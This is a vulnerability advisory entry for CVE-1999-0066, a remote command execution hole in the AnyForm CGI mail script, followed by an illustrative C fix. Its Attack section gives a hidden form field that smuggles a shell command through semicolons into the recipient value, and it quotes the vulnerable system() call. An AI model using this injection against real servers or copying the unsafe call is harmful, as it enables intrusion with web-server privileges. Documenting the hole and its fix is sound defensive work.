Brief description: AnyForm allows arbitrary commands to be run
Full description: AnyForm passes form data to a system call without performing sanity checks. There is virtually no error checking, and neither you nor the user will likely receive any indication of a failure if the address entered is not correct.
Components: Affected versions: all versions; Affected Platform: Common Gateway Interface (CGI)
Systems:
Effect(s) of exploiting: This allows the attacker to run commands with the privileges of the web server
Detecting the hole:
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0066 -- AnyForm CGI remote execution
Attack: To exploit, create a form with a hidden field something like this:

    <input type="hidden" name="AnyFormTo" value="foo@bar.com;command-to-execute with whatever arguments;/usr/lib/sendmail -t foo@bar.com ">

Then submit the form to the AnyForm CGI on the server to be attacked. The value of this parameter is passed to this code:

    SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
    system(SystemCommand);

Since system() invokes a shell, the semicolons are treated as command delimiters and anything can be inserted.
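
For contrast with the system() call above, a shell-free way to hand the same recipient to sendmail, written as an added example and not taken from AnyForm's source. The function names recipient_is_safe and send_form_mail and the allowlist of address characters are assumptions made for illustration.

```c
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical allowlist check: exactly one local@domain address, built only
   from characters that mean nothing to a shell or to sendmail's option parser. */
int recipient_is_safe(const char *addr)
{
    size_t i, len = strlen(addr);
    const char *at = strchr(addr, '@');

    if (len == 0 || len > 254 || addr[0] == '-')   /* leading '-' reads as an option */
        return 0;
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@'))
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!isalnum(c) && strchr("@._+-", c) == NULL)
            return 0;                              /* rejects ';', spaces, quotes, '`' */
    }
    return 1;
}

/* Runs sendmail with the recipient as one argv element, so no shell ever parses it.
   Returns sendmail's exit status, or -1 when the input is rejected or the call
   fails, which gives the caller the failure indication the original lacked. */
int send_form_mail(const char *recipient, const char *msg_path)
{
    int status, fd;
    pid_t pid;

    if (!recipient_is_safe(recipient))
        return -1;
    fd = open(msg_path, O_RDONLY);
    if (fd < 0)
        return -1;
    pid = fork();
    if (pid == 0) {
        char *argv[] = { "/usr/lib/sendmail", "-t", (char *)recipient, NULL };
        if (dup2(fd, STDIN_FILENO) < 0) _exit(127); /* replaces the shell's "< file" */
        close(fd);
        execv(argv[0], argv);
        _exit(127);                                /* exec itself failed */
    }
    close(fd);
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```
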
Advisories: ISS X-Force database entry http-cgi-anyform; Bugtraq letter from Paul Phillips
Related Vulnerabilities:
Reporting: Paul Phillips in Bugtraq (Mon Jul 31 1995 21:26:51)